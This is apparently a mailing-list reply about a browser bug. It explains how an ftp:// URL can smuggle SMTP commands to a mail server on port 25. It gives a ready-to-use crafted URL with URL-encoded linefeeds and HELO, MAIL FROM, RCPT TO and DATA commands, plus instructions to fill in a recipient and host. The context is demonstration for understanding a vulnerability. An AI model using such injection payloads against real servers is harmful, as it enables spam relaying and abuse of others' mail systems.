Rip Toren wrote:
> 
> OK....
>    I am trying to get a grip on this.
> 
> The spammer uses this magic URL in his browser. The browser connects to
> 'host' at port 25, while expecting to implement an FTP login. The remote
> server picks up the 'SMTP commands here' and the envokes sendmail to
> send some spam?
> 
> Is this possibly a configuration problem for the server or the sendmail.
> I can see where the sendmail would simply see a local forwarding, but I
> don't follow what the browser does to tie the two (it's input and
> sendmail) together.
> 
> Can you go into more detail about the significance of the LineFeed and
> the SMTP commands?

I do not know details, but try this link:

ftp://%0aHELO%20localhost%0aMAIL%20FROM%3a%3cnobody%40mozilla.org%3e%0aRCPT%20TO%3a%3cXXX%3e%0aDATA%0atest%0a.%0aQUIT@YYY:25

Replace XXX with your mail address (e.g. rptoren%40missi.ncsc.mil )
and YYY with a host accepting mail for you (e.g. stingray.missi.ncsc.mil ).

BTW, what does IE with such a link?

Clarence

Reply via email to